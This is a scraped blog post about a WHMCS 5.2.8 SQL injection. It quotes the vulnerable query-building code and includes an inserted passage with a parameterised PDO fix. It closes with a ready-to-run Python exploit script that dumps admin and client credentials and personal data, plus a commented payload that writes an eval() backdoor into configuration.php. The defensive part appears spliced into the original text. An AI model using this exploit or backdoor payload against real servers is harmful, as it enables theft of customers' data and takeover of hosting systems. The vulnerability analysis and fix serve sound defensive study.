WHMCS 5.2.8 Vulnerability

Posted by 没穿底裤 on 2020-01-01 00:25:29 · 397 views · 413 characters · 1 min 22 s read

Here we go again: the poor new WHMCS version got exploited again!

This time it is again the same mistake, in

/includes/dbfunctions.php

We can manipulate the GET/POST variables so that a WHERE criterion ends up as $key = array('sqltype' => 'TABLEJOIN', 'value' => '[SQLI]'); the TABLEJOIN branch concatenates the value into the query without quotes, so db_escape_string() does nothing to stop injection.

From this vulnerability we can even change /configuration.php to whatever we want (PHP code included).
```php
// Vulnerable select_query() from /includes/dbfunctions.php (WHMCS <= 5.2.8), as posted.
function select_query($table, $fields, $where, $orderby = '', $orderbyorder = '', $limit = '', $innerjoin = '') {
    global $CONFIG;
    global $query_count;
    global $mysql_errors;
    global $whmcsmysql;
    if (!$fields) {
        $fields = '*';
    }
    $query = 'SELECT ' . $fields . ' FROM ' . db_make_safe_field($table);
    if ($innerjoin) {
        $query .= ' INNER JOIN ' . db_escape_string($innerjoin);
    }
    if ($where) {
        if (is_array($where)) {
            $criteria = array();
            foreach ($where as $origkey => $value) {
                $key = db_make_safe_field($origkey);
                // An array value lets the caller (and, via request arrays, the client)
                // pick the comparison operator through 'sqltype'.
                if (is_array($value)) {
                    if ($key == 'default') {
                        $key = '`default`';
                    }
                    if ($value['sqltype'] == 'LIKE') {
                        $criteria[] = $key . ' LIKE \'%' . db_escape_string($value['value']) . '%\'';
                        continue;
                    }
                    if ($value['sqltype'] == 'NEQ') {
                        $criteria[] = $key . '!=\'' . db_escape_string($value['value']) . '\'';
                        continue;
                    }
                    // The numeric comparisons below concatenate the escaped value unquoted,
                    // so escaping quote characters does not prevent injection.
                    if ($value['sqltype'] == '>') {
                        $criteria[] = $key . '>' . db_escape_string($value['value']);
                        continue;
                    }
                    if ($value['sqltype'] == '<') {
                        $criteria[] = $key . '<' . db_escape_string($value['value']);
                        continue;
                    }
                    if ($value['sqltype'] == '<=') {
                        $criteria[] = $origkey . '<=' . db_escape_string($value['value']);
                        continue;
                    }
                    if ($value['sqltype'] == '>=') {
                        $criteria[] = $origkey . '>=' . db_escape_string($value['value']);
                        continue;
                    }
                    // TABLEJOIN: same unquoted concatenation; this is the branch the
                    // advisory's request shape reaches.
                    if ($value['sqltype'] == 'TABLEJOIN') {
                        $criteria[] = $key . '=' . db_escape_string($value['value']);
                        continue;
                    }
                    if ($value['sqltype'] == 'IN') {
                        $criteria[] = $key . ' IN (\'' . implode('\',\'', db_escape_array($value['values'])) . '\')';
                        continue;
                    }
                    continue;
                }
[...]
?>
```
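The fix a defender wants here is structural: values must be bound as parameters rather than concatenated, and the operator selected through 'sqltype' must be checked against an allowlist. The following is an added example written for this page, not WHMCS code; build_where(), select_query_safe(), safe_identifier() and the ALLOWED_SQLTYPES map are assumed names, and the SQLite table and rows are constructed sample data. It keeps the same $where array shape the vulnerable function accepts, so the request from the advisory (tid[sqltype]=TABLEJOIN&tid[value]=-1 union select ...) becomes an ordinary string comparison that matches nothing.

```php
<?php
// Added example (not WHMCS code): a criteria builder that binds values with PDO
// placeholders instead of concatenating them into the SQL text.

// Operators a caller may request through 'sqltype'. Anything else is rejected
// instead of being silently skipped as in the original.
const ALLOWED_SQLTYPES = [
    'EQ' => '=', 'TABLEJOIN' => '=', 'NEQ' => '!=', 'LIKE' => 'LIKE',
    '>' => '>', '<' => '<', '>=' => '>=', '<=' => '<=', 'IN' => 'IN',
];

// Identifiers cannot be bound as parameters, so they are validated against a
// strict pattern and backtick-quoted (this stands in for db_make_safe_field()).
function safe_identifier(string $name): string
{
    if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]*(\.[A-Za-z_][A-Za-z0-9_]*)?$/', $name)) {
        throw new InvalidArgumentException("Invalid identifier: $name");
    }
    return '`' . str_replace('.', '`.`', $name) . '`';
}

// Builds "col op ?" fragments plus the matching list of bound values. The value
// never becomes part of the SQL text, so "-1 union select ..." stays a literal.
function build_where(array $where): array
{
    $criteria = [];
    $params   = [];
    foreach ($where as $origkey => $value) {
        $key = safe_identifier((string) $origkey);
        if (!is_array($value)) {
            $criteria[] = "$key = ?";
            $params[]   = $value;
            continue;
        }
        $sqltype = (string) ($value['sqltype'] ?? 'EQ');
        if (!isset(ALLOWED_SQLTYPES[$sqltype])) {
            throw new InvalidArgumentException("Unsupported sqltype: $sqltype");
        }
        $op = ALLOWED_SQLTYPES[$sqltype];
        if ($op === 'IN') {
            $values = array_values($value['values'] ?? []);
            if ($values === []) {
                $criteria[] = '0'; // "IN ()" is a syntax error; match nothing instead
                continue;
            }
            $criteria[] = "$key IN (" . implode(',', array_fill(0, count($values), '?')) . ')';
            foreach ($values as $v) {
                $params[] = $v;
            }
            continue;
        }
        if ($op === 'LIKE') {
            $criteria[] = "$key LIKE ?";
            $params[]   = '%' . $value['value'] . '%';
            continue;
        }
        $criteria[] = "$key $op ?";
        $params[]   = $value['value'];
    }
    return [implode(' AND ', $criteria), $params];
}

// $fields is validated as a list of identifiers (or '*'); it must come from
// application code, never from request data.
function select_query_safe(PDO $pdo, string $table, string $fields, array $where): PDOStatement
{
    if ($fields !== '*') {
        $fields = implode(', ', array_map('safe_identifier', array_map('trim', explode(',', $fields))));
    }
    $sql    = 'SELECT ' . $fields . ' FROM ' . safe_identifier($table);
    $params = [];
    if ($where !== []) {
        [$clause, $params] = build_where($where);
        $sql .= ' WHERE ' . $clause;
    }
    $stmt = $pdo->prepare($sql);
    $stmt->execute($params);
    return $stmt;
}

// Demonstration against an in-memory SQLite database with constructed sample data.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE tbltickets (id INTEGER, tid TEXT, subject TEXT)');
$pdo->exec("INSERT INTO tbltickets VALUES (1, 'ABC-123', 'hello')");

// Same $where shape as tid[sqltype]=TABLEJOIN&tid[value]=...: the hostile value
// is compared as a plain string and returns no rows; the legitimate one matches.
$hostile = ['tid' => ['sqltype' => 'TABLEJOIN', 'value' => '-1 union select 1,2,3#']];
$legit   = ['tid' => ['sqltype' => 'TABLEJOIN', 'value' => 'ABC-123']];
printf("hostile rows: %d\n", count(select_query_safe($pdo, 'tbltickets', 'id, subject', $hostile)->fetchAll()));
printf("legit rows:   %d\n", count(select_query_safe($pdo, 'tbltickets', 'id, subject', $legit)->fetchAll()));
```

The two properties that matter are that the operator is chosen from a fixed map rather than copied from input, and that every comparison, including the formerly unquoted numeric and TABLEJOIN ones, goes through a placeholder. Replacing db_escape_string() with a "better" escaper would not achieve the second property, because escaping only protects values that are inside quotes.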
SO Re-edit Your Previous WHMCS.py exploit script and ENJOY!

Exp:
```python
#!/usr/bin/env python
# 2013/10/18 - WHMCS <=5.2.8 SQL Injection
#

url = 'http://client.target.com/'

import urllib, re, sys
from urllib2 import Request, urlopen
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"

def exploit(sql):
    sqlUnion = '-1 union select 1,0,0,0,0,0,0,0,0,0,0,%s,0,0,0,0,0,0,0,0,0,0,0#' % sql
    print "Doing stuff: %s" % sqlUnion
    #you could exploit any file that does a select, I randomly chose viewticket.php
    r = urlopen(Request('%sviewticket.php' % url, data="tid[sqltype]=TABLEJOIN&tid[value]=%s" % sqlUnion, headers={"User-agent": ua})).read()
    # the HTML tags that bracketed (.*?) in the original pattern were lost when the page was scraped
    return re.search(r'(.*?)', r, re.DOTALL).group(1).strip()

#get admins
print exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)')

#get users
count = int(exploit('(SELECT COUNT(id) FROM tblclients)'))
print "User count %d" % count
for i in range(count):
    print exploit('(SELECT CONCAT(id,0x3a,firstname,0x3a,lastname,0x3a,address1,0x3a,address2,0x3a,city,0x3a,country,0x3a,ip,0x3a,email,0x3a,password) FROM tblclients LIMIT %d,1)' % i)

#are you evil? yes, you are!
#php = "1';eval($_REQUEST['lol_whmcs']);#"
#r = urlopen(Request('%sadmin/licenseerror.php?updatekey=true&whitelisted=1&newlicensekey=%s&match=1&username[sqltype]=TABLEJOIN&username[value]=-1||1=1%%23' % (url, urllib.quote_plus(php)), headers={"User-agent": ua})).read()
```

Source: CN-SEC 中文网, WHMCS 5.2.8 Vulnerability, http://cn-sec.com/archives/75239.html (posted 2020-01-01 00:25:29)